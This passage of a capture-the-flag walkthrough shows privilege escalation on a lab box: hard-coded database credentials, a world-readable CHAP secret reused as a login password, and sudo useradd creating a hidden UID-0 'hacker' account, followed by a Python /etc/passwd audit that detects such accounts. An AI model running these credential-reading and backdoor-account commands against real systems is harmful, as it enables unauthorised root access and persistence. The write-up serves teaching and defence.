www-data@ino:/home/ppp$ 

That is the user flag (local.txt).

Privilege escalation

Searching the web root turned up the application's database connection file, with the MySQL credentials hard-coded in it:

www-data@ino:/var/www/html/lot/admin$ cat db_connect.php
cat db_connect.php
<?php 

$conn= new mysqli('localhost','lot','lot','lot_db')or die("Could not connect to mysql".mysqli_error($con));
www-data@ino:/var/www/html/lot/admin$ mysql -ulot -p
mysql -ulot -p
Enter password: lot

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 179
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

Logging in to the database works with those credentials, but it offers no route to root. The interesting lead is the only home directory, ppp: PPP (Point-to-Point Protocol) is also a service whose configuration, including its secrets files, lives under /etc/ppp, so look there:

www-data@ino:/var/www/html/lot/admin$ cd /etc/ppp
cd /etc/ppp
www-data@ino:/etc/ppp$ ls -alh
ls -alh
total 68K
drwxr-xr-x  7 root dip  4.0K Oct 26  2020 .
drwxr-xr-x 94 root root 4.0K Dec  6  2020 ..
-rw-r--r--  1 root root  101 Oct 26  2020 chap-secrets
-rwxr-xr-x  1 root root 1.8K Feb 20  2020 ip-down
drwxr-xr-x  2 root root 4.0K Oct 26  2020 ip-down.d
-rwxr-xr-x  1 root root 1.9K Feb 20  2020 ip-up
drwxr-xr-x  2 root root 4.0K Oct 26  2020 ip-up.d
-rwxr-xr-x  1 root root  784 Feb 20  2020 ipv6-down
drwxr-xr-x  2 root root 4.0K Feb 20  2020 ipv6-down.d
-rwxr-xr-x  1 root root  922 Feb 20  2020 ipv6-up
drwxr-xr-x  2 root root 4.0K Feb 20  2020 ipv6-up.d
-rw-r--r--  1 root root  13K Feb 20  2020 options
-rw-------  1 root root 1.6K Oct 26  2020 pap-secrets
drwxr-s---  2 root dip  4.0K Oct 26  2020 peers
www-data@ino:/etc/ppp$ cat chap-secrets
cat chap-secrets
# Secrets for authentication using CHAP
# client        server  secret                  IP addresses
ppp     *       ESRxd7856HVJB   *


chap-secrets (world-readable here, unlike pap-secrets) holds the CHAP secret for the client ppp, and that string turns out to be the ppp user's login password as well: credential reuse between the service and the account. Switch to ppp with su (or SSH in with it). The post does not show sudo -l, so check it before relying on this step, but ppp evidently has sudo rights, and the quickest way to root is useradd with -o (allow a non-unique UID) and -u 0: the new account hacker is UID 0 and therefore root in everything but name. -p expects a crypt(3)-format hash, which is why the password is run through openssl passwd:

ppp@ino:~$ sudo useradd -p `openssl passwd 123456` hacker -o -u 0 -g root -G root -s /bin/sh -d /home/hacker
ppp@ino:~$ su - hacker
su - hacker
Password: 123456

su: warning: cannot change directory to /home/hacker: No such file or directory
# cd /root
cd /root
# ls 
ls 
proof.txt
# cat proof.txt
cat proof.txt
21bae0a12690199cde7a65bff57723a5
# 

Root obtained! Note that this leaves a second UID-0 account in /etc/passwd, which any later audit of the box will notice; on a real engagement, record it and remove it at the end.
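The defensive counterpart of the useradd trick, as an added example that is not part of the original post: a small /etc/passwd audit that flags any account other than root carrying UID 0 (what -o -u 0 produces) and any account whose password field holds a hash instead of the shadow pointer x. The sample passwd content is constructed, not taken from the target.

```python
from typing import Dict, List

# Constructed sample, not the target's real /etc/passwd: four ordinary Debian
# accounts followed by the line that the walkthrough's
# "useradd -p ... hacker -o -u 0 -g root -G root -s /bin/sh -d /home/hacker"
# command produces.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
ppp:x:1000:1000:ppp,,,:/home/ppp:/bin/bash
hacker:x:0:0::/home/hacker:/bin/sh
"""

# passwd(5) field order.
FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")


def parse_passwd(text: str) -> List[Dict[str, str]]:
    """Parse passwd(5) content into dicts, skipping blank, comment and malformed lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != len(FIELDS):
            continue  # malformed line: do not let it abort the whole audit
        entries.append(dict(zip(FIELDS, fields)))
    return entries


def find_uid0_backdoors(text: str) -> List[str]:
    """Names of accounts other than root whose UID is 0.

    useradd -o bypasses the unique-UID check, so a second UID-0 login is
    legal to the tools but almost never legitimate on a server.
    """
    return [
        e["name"]
        for e in parse_passwd(text)
        if e["name"] != "root" and e["uid"] == "0"
    ]


def find_hash_in_passwd(text: str) -> List[str]:
    """Accounts whose password field is something other than the shadow pointer.

    'x' means the hash lives in /etc/shadow; '*', '!' and '' are locked or
    empty. Anything else is a hash sitting in a world-readable file.
    """
    return [
        e["name"]
        for e in parse_passwd(text)
        if e["passwd"] not in ("x", "*", "!", "")
    ]


def audit_file(path: str = "/etc/passwd") -> Dict[str, List[str]]:
    """Run both checks against a real file on the host being audited."""
    with open(path, encoding="utf-8") as fh:
        text = fh.read()
    return {
        "uid0": find_uid0_backdoors(text),
        "hash_in_passwd": find_hash_in_passwd(text),
    }


if __name__ == "__main__":
    print(find_uid0_backdoors(SAMPLE_PASSWD))
    print(find_hash_in_passwd(SAMPLE_PASSWD))
```

The UID check is the one that matters for this box: the hacker account has a normal x in the password field and would pass a naive "does passwd contain hashes" scan, but it is still root.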

posted @ 2022-11-25 16:11  Jason_huawen